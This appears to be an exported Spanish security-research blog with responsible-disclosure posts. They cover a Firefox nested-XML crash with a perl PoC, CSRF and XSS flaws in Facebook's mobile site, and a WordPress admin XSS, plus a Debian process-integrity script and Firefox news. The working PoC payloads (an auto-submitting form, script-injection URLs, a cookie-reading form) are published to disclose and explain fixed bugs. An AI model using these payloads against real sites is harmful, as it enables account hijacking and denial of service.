PROCESS_NAME: firefox.exe<br />
<br />
ADDITIONAL_DEBUG_TEXT: <br />
Use '!findthebuild' command to search for the target build information.<br />
If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.<br />
<br />
MODULE_NAME: xul<br />
<br />
FAULTING_MODULE: 7c910000 ntdll<br />
<br />
DEBUG_FLR_IMAGE_TIMESTAMP: 4b5101ce<br />
<br />
ERROR_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva p gina de seguridad para la pila.<br />
<br />
EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva p gina de seguridad para la pila.<br />
<br />
EXCEPTION_PARAMETER1: 00000001<br />
<br />
EXCEPTION_PARAMETER2: 00032ffc<br />
<br />
DEFAULT_BUCKET_ID: STACK_OVERFLOW<br />
<br />
PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW<br />
<br />
BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_WRONG_SYMBOLS<br />
<br />
LAST_CONTROL_TRANSFER: from 00000000 to 100f1338<br />
<br />
TACK_TEXT: <br />
00000000 00000000 00000000 00000000 00000000 xul!NS_Realloc_P+0x3f68<br />
<br />
(...)<br />
<br />
<webcore::inlineflowbox::placeboxesvertically(int, bool,="" int&)+20="" int&,="" int,=""><br />
<br />
El impacto es claro: un atacante remoto puede causar una denegación de servicio a otros usuarios simplemente con visitar un sitio web.<br />
<br />
<br />
Cuando se envió el informe, desde Mozilla abrieron un bug en su <a href="https://bugzilla.mozilla.org/">bugzilla</a>, para más tarde marcarlo como <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=547226">duplicado</a> de este otro bug: <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=485941">(CVE-2009-1232) Stack overflow using overly-deep XML tree (DoS)</a>, relacionado con XUL, y que más tarde se vió que era un problema generico en el parser XML.<br />
<br />
Este bug anda danzando desde 2009, atribuido a Wojciech Pawlikowski, y que según los informes inicialmente afectaba a Firefox 3.0.x, podeis ver los detalles en:<br />
<br />
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1232">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1232</a><br />
<a href="http://www.blogger.com/Mozilla%20Firefox%20XUL%20Parser%20Start%20Tags%20Denial%20of%20Service%20Vulnerability">http://www.securityfocus.com/bid/34522</a><br />
<br />
<br />
El problema viene porque este bug sigue sin parchear y es perfectamente reproducible en la última versión estable de Firefox 3.6.6 e incluso en la versión beta1 de Firefox 4.<br />
<br />
Lo que me ha extrañado es que cerca de arreglarlo, en la beta1 de Firefox 4, es posible reproducir un crash con unos ~20K tags XML anidados, cuando Firefox 3.6.6 necesita ~30K.<br />
<br />
Para reproducir el bug simplemente podeis usar:<br />
</webcore::inlineflowbox::placeboxesvertically(int,></webcore::inlineflowbox::placeboxesvertically(int,>$ perl -e 'print "<<x>x</x>>"30000' > poc.xml</x><br />
<x><webcore::inlineflowbox::placeboxesvertically(int, bool,="" int&)+20="" int&,="" int,=""><x> <br />
O visitar uno de estos dos PoCs:<br />
<br />
<a href="https://bugzilla.mozilla.org/attachment.cgi?id=427791">Firefox Remote DoS. Si haces click aqui usando Firefox 3.6.6 / 4beta1 el navegador se cerrará.</a><br />
<br />
<a href="https://bugzilla.mozilla.org/attachment.cgi?id=427793">Firefox Remote DoS. Si haces click aqui usando Firefox 3.6.6 / 4beta1 el navegador se cerrará.</a><br />
<br />
<br />
Espero que para la versión final de Firefox 4 incluyan un fix para este bug. </x></webcore::inlineflowbox::placeboxesvertically(int,></x>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-38794299955390754372010-06-29T04:39:00.000-07:002010-08-12T04:35:34.465-07:00Firefox 4 roadmap<b>Actualizado:</b> Se ha publicado la primera versión<b> beta de Firefox 4</b>, puedes probarla desde <a href="http://www.mozilla.com/en-US/firefox/beta/">http://www.mozilla.com/en-US/firefox/beta/</a> y leer sobre ella desde <a href="http://hacks.mozilla.org/2010/07/firefox-4-beta-1-is-here-whats-in-it-for-web-developers/">http://hacks.mozilla.org/2010/07/firefox-4-beta-1-is-here-whats-in-it-for-web-developers/</a><br />
<br />
<b>Actualizado(2):</b> Se ha publicado la segunda versión beta de Firefox 4, más detalles en: <a href="http://hacks.mozilla.org/2010/07/firefox4-beta2/">Firefox 4 b2</a><br />
<br />
<b>Actualizado(3):</b> Se ha publicado la tercera versión beta de Firefox 4, más detalles en: <a href="https://developer.mozilla.org/devnews/index.php/2010/08/11/firefox-4-beta-3-now-available-for-download/">Firefox 4 b3</a> <b>Impresionante el video sobre multi-touch</b> <a href="http://hacks.mozilla.org/2010/08/firefox4-beta3/">Experimenting with multi-touch</a><br />
<br />
Últimamente estoy siguiendo de cerca el desarrollo de Firefox, y simplemente quiero compartir una nota rápida para dejaros un par de enlaces acerca del roadmap para Firefox 4.<br />
<br />
Firefox 4 será publicado con muchas novedades, entre ellas Gecko 2. Pégale un vistazo al video o las slides para enterarte de todas ellas.<br />
<br />
Una de estas nuevas características ya está incluida en la actual versión de Firefox, <a href="https://wiki.mozilla.org/Firefox/Crash_Protection">crash protection</a> es una medida que mejora la seguridad y estabilidad del navegador ejecutando los plugins en procesos diferentes, de tal manera, que si falla el plugin no afecte a todo el nevagador. Esta nueva mejora estaba inicialmente planteada para Firefox 3.7, pero ha sido incluida en Firefox 3.6.4 (3.7 fue renombrado a 3.6.4). Ayer mismo, publicaron un update (Firefox 3.6.6) para actualizar el timeout ante la detección de cuelgues de 10 a 45 segundos por temas de compatibilidad con equipos lentos. Esta es la última versión estable actualmente (la version 3.6.5 se la han saltado).<br />
<br />
Además, el update de la versión 3.6.4 (now 3.6.6) corrige las siguientes vulnerabilidades (click en el MFSA ID para obtener más información):<br />
<br />
<style type="text/css">
.critical { background-color: #ff8080; }
.high { background-color: #ffc080; }
.moderate { background-color: #ffff80; }
#toc, .vulnlist { margin-left: 2em; }
</style><br />
<h3 id="firefox3.6.4">Vulnerabilities fixed in Firefox 3.6.4</h3><br />
<a class="low" href="http://www.mozilla.org/security/announce/2010/mfsa2010-33.html">MFSA 2010-33</a> User tracking across sites using Math.random()<br />
<a class="moderate" href="http://www.mozilla.org/security/announce/2010/mfsa2010-32.html">MFSA 2010-32</a> Content-Disposition: attachment ignored if Content-Type: multipart also present<br />
<a class="moderate" href="http://www.mozilla.org/security/announce/2010/mfsa2010-31.html">MFSA 2010-31</a> focus() behavior can be used to inject or steal keystrokes<br />
<a class="critical" href="http://www.mozilla.org/security/announce/2010/mfsa2010-30.html">MFSA 2010-30</a> Integer Overflow in XSLT Node Sorting<br />
<a class="critical" href="http://www.mozilla.org/security/announce/2010/mfsa2010-29.html">MFSA 2010-29</a> Heap buffer overflow in nsGenericDOMDataNode::SetTextInternal<br />
<a class="critical" href="http://www.mozilla.org/security/announce/2010/mfsa2010-28.html">MFSA 2010-28</a> Freed object reuse across plugin instances<br />
<a class="critical" href="http://www.mozilla.org/security/announce/2010/mfsa2010-26.html">MFSA 2010-26</a> Crashes with evidence of memory corruption (rv:1.9.2.4/ 1.9.1.10)<br />
<br />
Impact key:<br />
<ul><li><span class="critical">Critical:</span> Vulnerability can be used to run attacker code and install software, requiring no user interaction beyond normal browsing. </li>
<li><span class="high">High:</span> Vulnerability can be used to gather sensitive data from sites in other windows or inject data or code into those sites, requiring no more than normal browsing actions. </li>
<li><span class="moderate">Moderate:</span> Vulnerabilities that would otherwise be High or Critical except they only work in uncommon non-default configurations or require the user to perform complicated and/or unlikely steps. </li>
<li><span class="low">Low:</span> Minor security vulnerabilities such as Denial of Service attacks, minor data leaks, or spoofs. (Undetectable spoofs of SSL indicia would have "High" impact because those are generally used to steal sensitive data intended for other sites.) </li>
</ul><br />
<br />
Actualizar es más que recomendable. Seguiremos al tanto de nuevas noticias en cuanto a Firefox 4, a día de hoy se puede probar una versión alpha en <a href="http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-central/">http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-central/</a> o <a href="http://nightly.mozilla.org/">http://nightly.mozilla.org/</a><br />
<br />
<br />
<b>Aqui os dejo los enlaces a la presentación por parte de los responsables de Mozilla de Firefox 4:</b><br />
<br />
<br />
<a href="http://videos.mozilla.org/serv/air_mozilla/firefox4.ogg">Ver el video</a> (necesitais un navegador con soporte ogg, Firefox por ejemplo)<br />
<br />
<br />
Slides:<br />
<div id="__ss_4041936" style="width: 425px;"><b style="display: block; margin: 12px 0pt 4px;"><a href="http://www.slideshare.net/beltzner/firefox-roadmap-2010-0510" title="Firefox 4: fast, powerful and empowering">Firefox 4: fast, powerful and empowering</a></b><object height="355" id="__sse4041936" width="425"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=firefoxroadmap20100510-100510155953-phpapp01&stripped_title=firefox-roadmap-2010-0510" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse4041936" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=firefoxroadmap20100510-100510155953-phpapp01&stripped_title=firefox-roadmap-2010-0510" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object><br />
<div style="padding: 5px 0pt 12px;">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/beltzner">Mike Beltzner</a>.</div></div><br />
<a href="http://www.nitot.com/mozilla/firefox4/firefox%20roadmap%2020100510.pdf">O descargar las slides en fichero PDF</a><br />
<br />
<br />
El video y la presentación fue originalmente publicado en la web del speaker (Mike Beltzner de Mozilla): <a href="http://beltzner.ca/mike/2010/05/10/firefox-4-fast-powerful-and-empowering/">http://beltzner.ca/mike/2010/05/10/firefox-4-fast-powerful-and-empowering/</a><br />
<br />
<ul></ul>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-14500487309738882592010-04-20T12:33:00.000-07:002010-04-20T16:22:44.650-07:00Script para comprobar la integridad de procesos en Debian GNU/Linux<blockquote></blockquote>Hola,<br />
<br />
Desde que me uní al Ethical Hacking Team de IBM y me vine a vivir a Dublín, he andado bastante liado y no he dedicado mucho tiempo a postear en el blog ni en twitter, cosa que voy a intentar cambiar poniendome rápidamente al día. Por aqui todo anda de maravilla :)<br />
<br />
Hoy, quiero compartir un script que escribí cuando leí un post de @secbydefault sobre <a href="http://www.securitybydefault.com/2010/01/analisis-de-procesos-en-sistemas-redhat.html">cómo comprobar la integridad de procesos en sistemas basados en rpm</a> (tales como RedHat o CentOS). Lo que hice básicamente es migrar el script que proponían de sistemas RedHat a Debian debido a que varias personas dejaron comentarios en el post interesadas en una versión para Debian y a mi también me interesaba disponer de una versión funcional que funcionara correctamente en mi sistema.<br />
<br />
Lo primero es comentar que haciendo unas pruebas, el script propuesto por @secbydefault falla en ciertas situaciones. Si un atacante en lugar de modificar un binario lo que hace es eliminarlo del sistema de ficheros directamente, el script no parsea adecuadamente los nombres de los binarios. Esta sería la entrada que tomaría el script en caso de que eliminaramos un binario:<br />
<br />
<blockquote><div>$ perl <a href="http://procy.pl/" target="_blank">procy.pl</a> </div><div>/sbin/init</div><div>(deleted) /usr/sbin/apache2</div><div>/bin/bash</div><div>(deleted) /usr/sbin/apache2</div><div>/bin/bash</div><div>(...)</div><div>etc</div></blockquote><br />
Como se puede ver el script extrae como nombre de binario en caso del proceso de apache2 "(deleted) /usr/sbin/apache2" lo cual es incorrecto. Este fallo, podemos arreglarlo aplicando este fix; modificar las siguientes dos líneas (correspondientes <a href="http://pastebin.com/f6bc170c">según este link</a> a la 22 y 24):<br />
<br />
<blockquote>$status =~ /-> (.*)$/; <br />
my $binary = $1 ;</blockquote><br />
a:<br />
<br />
<blockquote>$status =~ /->( \(.*\))? (.*)$/;<br />
my $binary = $2 ; </blockquote><br />
Nota: Avisé a @secbydefault por aquel entonces sobre estos detalles y quedaron en actualizarlo pero nunca lo hicieron.<br />
<b>UPDATE:</b> ya han actualizado la entrada en SbD, gracias!<br />
<br />
En mi caso, para migrarlo a Debian he traducido el script de perl a bash script, ya que me siento más cómodo con este lenguaje, y usando bash ha quedado bien sencillo :)<br />
<br />
El objetivo es encontrar procesos ejecutandose en la máquina cuyos binarios se hayan modificado, para conseguirlo el funcionamiento básico del sistema es en primer lugar listar los procesos de la máquina mediante ps, a través de /proc/[pid]/exe extraer la ruta del binario en el filesystem y realizar un dpkg -S para ver en que paquete se encuentra, para seguidamente aplicar debsums y comprobar la integridad del fichero.<br />
<br />
<br />
El script para debian hace uso del paquete debsums, el cual se encarga de comprobar la integridad de los ficheros instalados en el sistema por los paquetes mediante sumas de comprobación MD5.<br />
<br />
Un paso necesario antes de usar este script es instalar el paquete debsums y generar las firmas md5, para esto tan sencillo como lanzar el siguiente comando desde usuario root:<br />
<br />
<blockquote>apt-get install debsums && debsums_gen</blockquote><br />
Veamos un ejemplo de ejecución en el cual he eliminado (de forma intencionada) el binario /usr/sbin/apache2 y he modificado el binario /usr/sbin/named:<br />
<br />
<blockquote>$./procy.sh<br />
El proceso [ 11569 /var/ossec/bin/ossec-maild ] no pertenece a ningún paquete<br />
<br />
El proceso [ 11573 /var/ossec/bin/ossec-execd ] no pertenece a ningún paquete<br />
<br />
El proceso [ 11577 /var/ossec/bin/ossec-analysisd ] no pertenece a ningún paquete<br />
<br />
El proceso [ 11580 /var/ossec/bin/ossec-logcollector ] no pertenece a ningún paquete<br />
<br />
El proceso [ 11584 /var/ossec/bin/ossec-syscheckd ] no pertenece a ningún paquete<br />
<br />
El proceso [ 11588 /var/ossec/bin/ossec-monitord ] no pertenece a ningún paquete<br />
<br />
El proceso [ 23557 /usr/sbin/named ] ha sufrido modificaciones en su paquete base (bind9): /usr/sbin/named FAILED<br />
<br />
El proceso [ 23815 /usr/sbin/apache2 ] ha sufrido modificaciones en su paquete base (apache2-mpm-prefork): debsums: can't open apache2-mpm-prefork file /usr/sbin/apache2 (No existe el fichero o el directorio)<br />
<br />
El proceso [ 6570 /usr/sbin/apache2 ] ha sufrido modificaciones en su paquete base (apache2-mpm-prefork): debsums: can't open apache2-mpm-prefork file /usr/sbin/apache2 (No existe el fichero o el directorio)<br />
<br />
<br />
El proceso [ 6998 /usr/sbin/apache2 ] ha sufrido modificaciones en su paquete base (apache2-mpm-prefork): debsums: can't open apache2-mpm-prefork file /usr/sbin/apache2 (No existe el fichero o el directorio)</blockquote><br />
El script detecta que hay unos binarios que no pertenecen a ningún paquete (pertenecen al software <a href="http://www.ossec.net/">OSSEC</a>, un HIDS Open Source, y es debido a que se instaló de forma manual), también detecta que el binario named se ha modificado y que el binario de apache2 se ha eliminado. Por lo tanto cumple su función, por supuesto es muy sencillo y se puede mejorar con más detalles, los comentarios son bienvenidos.<br />
<br />
El código es el siguiente:<br />
<br />
<script src="http://pastebin.com/embed_js.php?i=ybyahqt7"></script><br />
<br />
<a href="http://pastebin.com/ybyahqt7">Descarga del script para Debian GNU/Linux</a><br />
<br />
<br />
Espero que os sea útil.Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-86436158436249628142010-02-16T03:58:00.000-08:002010-02-16T12:33:37.357-08:00Facebook: Cross-Site Request Forgery Vulnerability<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw93nhsmAPA8CBdABqIFm7qq5ybbLbkeIwAagr5QxJ3QdPsmkI09y1DoHMrW4esF664KG5Squ59p8GcvzSekLW4QAhIgqANPKI7zIRfvWY-QlwD5TP385e_8nXver6AV4_B6ZafJIrQC8W/s1600-h/facebook1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw93nhsmAPA8CBdABqIFm7qq5ybbLbkeIwAagr5QxJ3QdPsmkI09y1DoHMrW4esF664KG5Squ59p8GcvzSekLW4QAhIgqANPKI7zIRfvWY-QlwD5TP385e_8nXver6AV4_B6ZafJIrQC8W/s200/facebook1.jpg" width="200" /></a><br />
Cross-Site Request Forgery es un ataque que fuerza a la victima a realizar acciones no deseadas en una aplicación en la que ésta se encuentra autenticada.<br />
<br />
Como funciona este ataque? Un ejemplo simple, podría ser el siguiente, pongámonos en la situación de un servlet de un banco que permite realizar transacciones. <br />
Este servlet, usa los siguientes parámetros (acct y amount), veamos un ejemplo de petición HTTP:<br />
<br />
<br />
POST http://bank.com/transfer.do HTTP/1.1<br />
...<br />
...<br />
Content-Length: 19;<br />
<br />
acct=BOB&amount=100<br />
<br />
<br />
En account se establece la cuenta de destino y en amount el dinero a transferir. En este escenario, un atacante puede crear un formulario de tipo POST, que envíe esas dos variables al servlet, y preparar una página web en la cual este formulario se envie de manera automática mediante JavaScript. El atacante incita a la victima a visitar este enlace y directamente la transferencia se realiza sin intervencción por parte del usuario.<br />
<br />
El atacante ha conseguido que la victima ejecute acciones no deseadas, ya que ésta dispone de una sesión válida en la aplicación.<br />
<br />
Del mismo modo, la interfaz móvil de Facebook era vulnerable en el formulario de actualización del perfil a ataques de tipo CSRF, en concreto en el recurso http://m.facebook.com/a/editprofile.php<br />
<br />
El siguiente código, es un ejemplo que permite a un atacante modificar el número de teléfono en el perfil mediante esta técnica. Preparando el siguiente formulario para que se envíe automáticamente, haciendo que sea accesible en una página web y tratar que la victima lo visite mediante el envío de un enlace o cualquier otro método, concluiría en el compromiso del usuario y de la aplicación por parte del atacante:<br />
<br />
Prueba de concepto:<br />
<br />
<blockquote><html><br />
<head><br />
<script><br />
<br />
function send() {<br />
document.forms[0].submit();<br />
}<br />
<br />
</script><br />
</head><br />
<br />
<body onload="send();"><br />
<form action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact"; method="post"><br />
<input type="hidden" name="phone_num" value="600000000"><br />
<input type="hidden" name="save" value=""><br />
</form><br />
</body><br />
</html></blockquote><br />
<br />
El impacto es que un atacante puede forzar a otros usuarios de Facebook a realizar acciones no deseadas. La explotación con éxito de este ataque permitía la actualziación del perfil de la víctima.<br />
<br />
<br />
Mitigación:<br />
<br />
Es necesario implementar mecanismos de control con el objetivo de asegurar que el usuario además de estar autenticado y disponer de permisos para realizar una acción determinada (autorizado), no está siendo forzado por otros usuarios a realizar acciones no deseadas mediante CSRF.<br />
Para resolver este problema, hay varias soluciones, la más común, se trata de generar un token aleatorio al crear el formulario y almacenarlo con la información relacionada a él (recurso, usuario, perfil, formulario, etc), añadiéndolo como campo oculto en el formulario.<br />
Una vez se realiza la petición contra el servidor, se valida que ese token es válido. Un atacante que prepare un formulario malintencionado no podrá saber que token es válido y cúal no, por lo que con esta medida mitigamos el ataque.<br />
El equipo de seguridad de Facebook fue notificado lo antes posible en cuanto se descubió la vulnerabilidad y corrigió este bug de forma rápida, por lo que actualmente está solucionado.<br />
<br />
<br />
Disponeis del advisory original enviado a Full-disclosure:<br />
<br />
<a href="http://seclists.org/fulldisclosure/2010/Feb/274">http://seclists.org/fulldisclosure/2010/Feb/274</a><br />
<br />
<br />
<b>Muchas gracias! al <a href="http://www.facebook.com/security?v=app_6009294086">equipo de seguridad de Facebook</a> y a <a href="http://www.securitybydefault.com/2010/02/hackeos-memorables-juan-galiana-el.html">SecurityByDefault</a> <a href="http://twitter.com/secbydefault">@secbydefault</a> por las reseñas ;-)</b>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-26265879179974985922010-02-03T11:14:00.000-08:002010-02-05T02:34:51.186-08:00Vulnerabilidad de inyección de código HTML y JavaScript en Facebook<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw93nhsmAPA8CBdABqIFm7qq5ybbLbkeIwAagr5QxJ3QdPsmkI09y1DoHMrW4esF664KG5Squ59p8GcvzSekLW4QAhIgqANPKI7zIRfvWY-QlwD5TP385e_8nXver6AV4_B6ZafJIrQC8W/s1600-h/facebook1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw93nhsmAPA8CBdABqIFm7qq5ybbLbkeIwAagr5QxJ3QdPsmkI09y1DoHMrW4esF664KG5Squ59p8GcvzSekLW4QAhIgqANPKI7zIRfvWY-QlwD5TP385e_8nXver6AV4_B6ZafJIrQC8W/s200/facebook1.jpg" width="200" /></a></div><br />
La red social Facebook ocupa el puesto número 2 en el <a href="http://www.alexa.com/topsites">índice alexa</a> y según su COO, acceden a ella <a href="http://www.techcrunch.com/2010/02/01/facebook-coo-sheryl-sandberg-world-economic-forum-davos/">175 millones de usuarios cada día</a>.<br />
<br />
<br />
<br />
Hoy se ha publicado la primera de las vulnerabilidades que he encontrado en Facebook, y en concreto se trata de una inyección de código HTML y JavaScript que afecta a la interfaz móvil de la red social.<br />
<br />
En concreto, la variable 'q' en el recurso http://m.facebook.com/friends.php no era correctamente filtrada, por lo que un atacante podía realizar ataques de tipo Cross-Site Scripting (XSS) con el objetivo de robar las cookies del usuario, y por lo tanto, comprometer su cuenta de Facebook.<br />
<br />
El 'Proof of concept' era el siguiente: http://m.facebook.com/friends.php?q=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E<br />
<br />
<br />
El impacto de esta vulnerabilidad en una red social como Facebook, es el robo de cuentas de los usuarios afectados, por lo tanto se considera de relevante gravedad.<br />
Para aprovechar la vulnerabilidad el atacante tendría que preparar un enlace o sitio web con el código malicioso, con el objetivo de que las victimas lo visitaran. Y simplemente por el hecho de hacer click en un enlace o visitar un sitio web, sus cuentas quedarían automáticamente comprometidas.<br />
<br />
El estado actual de esta vulnerabilidad es corregido. Para conseguirlo, nos pusimos en contacto con el equipo de seguridad de Facebook con el objetivo de mitigar los errores encontrados, y a pesar de que en un primer momento no obtuvimos respuesta, actualmente mantenemos un canal de comunicación con el fin de que se corrija esta y otras vulnerabilidades que se han descubierto.<br />
<br />
<br />
<a href="http://seclists.org/fulldisclosure/2010/Feb/27">Teneis disponible el advisory original (english).</a><br />
<br />
A medida que el equipo de seguridad de Facebook notifique la correción de las vulnerabilidades reportadas, iré publicando más información en el blog.Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-43446062517781864862010-01-12T11:49:00.001-08:002010-01-12T11:49:53.881-08:00Hey there! jgaliana is using Twitter.Y ahora... usando twitter... <a href="http://twitter.com/jgaliana">http://twitter.com/jgaliana</a>Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-18801482189529252962010-01-09T08:16:00.000-08:002010-01-09T10:10:58.689-08:00Wordpress Administration Interface < 2.9 HTML and Script code Injection VulnerabilityHola,<br />
<br />
El siguiente es un aviso de seguridad para Wordpress en versiones anteriores a 2.9.<br />
Debido a la falta de validación de la entrada proporcionada por el usuario, el parámetro insertonly[href] no ha sido correctamente filtrado por lo que es posible injectar código HTML y de script en el contexto del navegador de la victima.<br />
<br />
El bug se encuentra en el fichero admin/media-upload.php y aquí podemos ver un PoC:<br />
<br />
<pre><form action="http://site/wordpress/wp-admin/media-upload.php?type=file&tab=type_url&
post_id=0" enctype="multipart/form-data" method="post">
<input name="insertonly[href]" size="80" type="text"
value="');</script>Wordpress XSS PoC<script>alert(document.cookie);</script><script> a('"/>
<input name="insertonlybutton" type="submit" value="Test PoC" />
</form>
</pre><br />
Este bug podría ser usado, si se implementara un autosubmit del formulario y se enviaran las cookies de sesión a un servidor externo para el robo de cuentas, pudiendo llegar a obtener la cuenta de administración sin necesidad de tener una cuenta en el sistema (nótese que además del XSS, al no existir una validación con token, estamos ante un XSRF, por este motivo, no es necesario estar en posesión de una cuenta para explotar la vulnerabilidad).<br />
<br />
El equipo de seguridad de Wordpress fue avisado del bug y publicaron la versión 2.9 que corrige la vulnerabilidad. La solución es actualizar a la versión 2.9 o 2.9.1 que acaban de publicar.<br />
<br />
Referencias:<br />
<br />
http://www.wordpress.org/<br />
<br />
SaludosJuan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com1tag:blogger.com,1999:blog-665899775980305966.post-40691907371514766112010-01-09T07:40:00.000-08:002010-01-09T07:40:20.635-08:00Resumen seguridad informática 2009 por unaaldiaHola,<br />
<br />
Debido a que el año pasado el blog no ha estado muy activo, enlazamos al resumen de seguridad informática para el año 2009 realizado por unaaldia, en el que se refleja lo más destacado referente a temas de seguridad.<br />
<br />
<a href="http://www.hispasec.com/unaaldia/4084">Resumen de seguridad informática 2009 (I/IV)</a><br />
<a href="http://www.hispasec.com/unaaldia/4085">Resumen de seguridad informática 2009 (II/IV)</a><br />
<a href="http://www.hispasec.com/unaaldia/4086">Resumen de seguridad informática 2009 (III/IV)</a><br />
<a href="http://www.hispasec.com/unaaldia/4087">Resumen de seguridad informática 2009 (IV/IV)</a><br />
<br />
<br />
Desde aquí, reconocer el esfuerzo que hacen desde Hispasec para mantener esta publicación día tras día.Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-51674122322894142062009-12-28T12:35:00.000-08:002010-01-08T01:37:26.483-08:00Avisos de seguridad 2009Hola,<br />
<br />
Este año ha estado lleno de cambios, entre ellos, uno de los más destacados es que actualmente resido en Barcelona por motivos laborales.<br />
Ha sido un año muy activo, en el cual he asistido a muchos eventos relacionados con la seguridad de la información y el mundo de la tecnología tales como las conferencias FIST, OWASP Spain Chapter Meeting, Hacking At Random (HAR), JDARE '09, LaCon '09, DISI, IBWAS '09,... en algunos de los cuales he participado como ponente. La previsión para el año que viene es igual o mejor, ya que se están organizando gran cantidad de eventos relacionados con temas de seguridad informática.<br />
<br />
Complementando los eventos y conferencias, he realizado a lo largo del año tareas de investigación de vulnerabilidades en software (la mayoría en aplicaciones web), de las cuales, se han publicado de forma responsable avisos de seguridad en listas relacionadas con la seguridad informática. A modo de resumen paso a citar algunos de estos "advisories":<br />
<b><br />
</b><br />
<b>ModSecurity Multiple Remote Denial of Service Vulnerabilities</b><br />
http://www.securityfocus.com/bid/34096<br />
CVE ID: CVE-2009-1902<br />
<br />
<b>Joomla! Prior to 1.5.11 Multiple Cross Site Scripting and HTML Injection Vulnerabilities</b><br />
http://www.securityfocus.com/bid/35189<br />
<br />
<b>Joomla! Remote File Upload Vulnerability And Information Disclosure Weakness</b><br />
http://www.securityfocus.com/bid/35780<br />
<br />
<b>Horde Application Framework Administration Interface 'PHP_SELF' Cross-Site Scripting Vulnerability</b><br />
<b></b><br />
http://www.securityfocus.com/bid/37351<br />
CVE ID: CVE-2009-3701<br />
<br />
<b>QuiXplorer 'lang' Parameter Local File Include Vulnerability </b><br />
http://www.securityfocus.com/bid/37393<br />
<br />
<b>WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities</b> <br />
<br />
http://www.securityfocus.com/bid/37357<br />
CVE ID: CVE-2009-3703<br />
<br />
<br />
<b>PHP-Calendar Multiple Remote And Local File Include Vulnerabilities</b><br />
http://www.securityfocus.com/bid/37450<br />
CVE-2009-3702<br />
<br />
<b>Joomla! Cross Site Scripting and Information Disclosure Vulnerabilities</b><br />
http://www.securityfocus.com/bid/35544<br />
<br />
<b>eXtplorer 'include/init.php' Local File Include Vulnerability</b><br />
http://www.securityfocus.com/bid/33955<br />
<br />
<b>WordPress MU 'wp-includes/wpmu-functions.php' Cross-Site Scripting Vulnerability</b><br />
http://www.securityfocus.com/bid/34075<br />
CVE ID: CVE-2009-1030<br />
<br />
<br />
<br />
<b>Simple PHP Blog 'blog_language1' Parameter Local File Include Vulnerability </b><br />
http://www.securityfocus.com/bid/37434<br />
<br />
<br />
A partir del 2010, espero poder ir publicando los avisos de seguridad en el blog a medida que vayan viendo la luz y cualquier otro apunte que considere interesante. Por lo demás, tan solo desearos un feliz año.Juan Galianahttp://www.blogger.com/profile/14086192616875312638noreply@blogger.com0tag:blogger.com,1999:blog-665899775980305966.post-80798420594177551072008-12-30T15:48:00.000-08:002009-09-18T09:58:01.117-07:00Ataque a SSL/HTTPS: afectadas CA's con firmas MD5Hola,<br/><br/>Estos días está teniendo lugar en Berlín el <a href="http://events.ccc.de/congress/2008/">25C3</a>, 25 Chaos Communication Congress. En él se están presentando interesantes ponencias en temas relacionados con la seguridad.<br/><br/>En concreto, hoy se ha presentado <a href="http://events.ccc.de/congress/2008/Fahrplan/track/Hacking/3023.en.html">MD5 considered harmful today, Creating a rogue CA Certificate</a>, un PoC en el que describen cómo aprovechar las colisiones MD5, para generar un certificado válido y realizar ataques de suplantación de identidad, afectando directamente a las redes de confianza, concepto en el que se basa la Public Key Infrastructure (PKI), y sobre el que se consolida gran parte de Internet.<br/><br/>Los investigadores en cuestión son Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger.<br/><br/>El problema de fondo es que existan CAs que continúen usando MD5 para sus firmas, aún cuando MD5 se sabe que está roto desde 2004, en relación a la posibilidad de encontrar colisiones y ya en 2007 se presentó un paper teórico de como atacar a una CA basado en estas premisas.<br/><br/>Ha tenido que ser en 2008, con la ayuda de un <a href="http://www.win.tue.nl/~bdeweger/PS3Lab/">CPD de 200 PS3</a> equivalente a 8000 CPUs estándar o $20k de tiempo en amazon EC2, cuando un equipo de investigadores de seguridad informática ha demostrado como explotar esta técnica en la práctica para afectar al protocolo <a href="http://es.wikipedia.org/wiki/HTTPS">HTTPS</a>, (si, el candadito que sale en la parte inferior derecha 